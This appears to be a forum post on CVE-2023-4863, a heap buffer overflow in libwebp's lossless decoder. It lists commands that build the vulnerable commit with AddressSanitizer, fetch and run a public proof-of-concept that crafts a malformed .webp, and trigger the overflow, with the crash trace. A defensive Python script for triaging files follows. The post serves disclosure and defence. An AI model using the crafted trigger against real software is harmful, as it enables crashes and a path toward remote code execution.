10-04-2023, 06:57 AM
The libwebp library processes images using the .webp format. It was created over a decade ago by Google and is used in most applications that render .webp images. The vulnerability may be exploited using a maliciously crafted .webp lossless file, which causes a buffer overflow in the vulnerable library.
Attacks against this vulnerability can range from denial of service (DoS) to possible remote code execution (RCE). As an example, closely related attacks such as the 0-day BLASTPASS exploit (Apple CVE-2023-41064, CVE-2023-41061) showed that malicious .webp images sent through the iMessage system could compromise a victim's iOS device without any interaction by its owner.
A POC for CVE-2023-4863. NOT an exploit
# checkout webp
$ git clone https://chromium.googlesource.com/webm/libwebp/ webp_test
$ cd webp_test/
# checkout vulnerable version
$ git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0
# enable AddressSanitizer
$ sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix
# build webp
$ make -f makefile.unix
$ cd examples/
# fetch mistymntncop's proof-of-concept code
$ wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c
# build and run proof-of-concept
$ gcc -o craft craft.c
$ ./craft bad.webp
# test trigger file
$ ./dwebp bad.webp -o test.png
=================================================================
==207551==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x56196a11635a bp 0x7ffd3e5cce90 sp 0x7ffd3e5cce80
WRITE of size 1 at 0x626000002f28 thread T0
#0 0x56196a116359 in BuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359)
#1 0x56196a1166e7 in VP8LBuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb66e7)
#2 0x56196a0956ff in ReadHuffmanCode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x356ff)
#3 0x56196a09a2b5 in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a2b5)
#4 0x56196a09e216 in VP8LDecodeHeader (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3e216)
#5 0x56196a0a011b in DecodeInto (/home/isosceles/source/webp/webp_test/examples/dwebp+0x4011b)
#6 0x56196a0a2f06 in WebPDecode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x42f06)
#7 0x56196a06c026 in main (/home/isosceles/source/webp/webp_test/examples/dwebp+0xc026)
#8 0x7f7ea8a8c082 in __libc_start_main ../csu/libc-start.c:308
#9 0x56196a06e09d in _start (/home/isosceles/source/webp/webp_test/examples/dwebp+0xe09d)
0x626000002f28 is located 0 bytes to the right of 11816-byte region [0x626000000100,0x626000002f28)
allocated by thread T0 here:
#0 0x7f7ea8f2d808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x56196a09a0eb in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a0eb)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359) in BuildHuffmanTable
...
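The trace above passes through VP8LDecodeHeader, so the trigger file has to reach the lossless (VP8L) decoder. As an added example (not from this post, from mistymntncop's PoC, or from libwebp), the following Python parses the RIFF/WEBP container and reports whether a file carries a VP8L bitstream, which helps triage which stored images should be re-checked with a patched decoder. All sample bytes are constructed inline and are not real images.

```python
import struct

def _chunk(fourcc: bytes, payload: bytes) -> bytes:
    # RIFF chunk: FourCC, little-endian size (excluding pad), payload padded to even length.
    return fourcc + struct.pack("<I", len(payload)) + payload + (b"\x00" if len(payload) % 2 else b"")

def _riff(chunks: bytes) -> bytes:
    # The RIFF size field counts everything after the 8-byte "RIFF<size>" prefix.
    return b"RIFF" + struct.pack("<I", 4 + len(chunks)) + b"WEBP" + chunks

# Constructed sample files (not real images): a 16x16 VP8L header, a lossy stub, and an
# extended (VP8X) container wrapping the same lossless bitstream.
_VP8L_HDR = b"\x2f" + struct.pack("<I", 15 | (15 << 14)) + b"\x00" * 4
SAMPLE_LOSSLESS = _riff(_chunk(b"VP8L", _VP8L_HDR))
SAMPLE_LOSSY = _riff(_chunk(b"VP8 ", b"\x00" * 10))
SAMPLE_EXTENDED = _riff(_chunk(b"VP8X", b"\x00" * 10) + _chunk(b"VP8L", _VP8L_HDR))

def iter_chunks(data: bytes):
    """Yield (fourcc, payload) for every chunk; raise ValueError on a malformed container."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WEBP":
        raise ValueError("not a RIFF/WEBP container")
    end = 8 + struct.unpack_from("<I", data, 4)[0]
    if end > len(data):
        raise ValueError("RIFF size field exceeds file length")
    pos = 12
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        if pos + 8 + size > end:
            raise ValueError(f"chunk {fourcc!r} runs past end of container")
        yield fourcc, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)  # skip the pad byte after odd-sized payloads

def parse_vp8l_header(payload: bytes) -> dict:
    """Decode the 5-byte VP8L header: signature 0x2f, then 14+14+1+3 bits (LSB first)."""
    if len(payload) < 5 or payload[0] != 0x2F:
        raise ValueError("bad VP8L signature")
    bits = struct.unpack_from("<I", payload, 1)[0]
    return {"width": (bits & 0x3FFF) + 1, "height": ((bits >> 14) & 0x3FFF) + 1,
            "alpha": bool((bits >> 28) & 1), "version": (bits >> 29) & 7}

def classify_webp(data: bytes) -> dict:
    """Triage record: chunk list, whether VP8X is used, and the VP8L header if present."""
    try:
        chunks = list(iter_chunks(data))
        lossless = next((parse_vp8l_header(p) for f, p in chunks if f == b"VP8L"), None)
    except ValueError as exc:
        return {"error": str(exc)}
    return {"chunks": [f.decode("ascii", "replace") for f, _ in chunks],
            "extended": b"VP8X" in [f for f, _ in chunks], "lossless": lossless}

if __name__ == "__main__":
    for name, blob in (("lossless", SAMPLE_LOSSLESS), ("lossy", SAMPLE_LOSSY), ("extended", SAMPLE_EXTENDED)):
        print(name, classify_webp(blob))
```

Files reported with a VP8L header (directly or inside a VP8X container) are the ones that exercise the decoder path shown in the stack trace; a `version` other than 0 or a malformed container is also worth flagging.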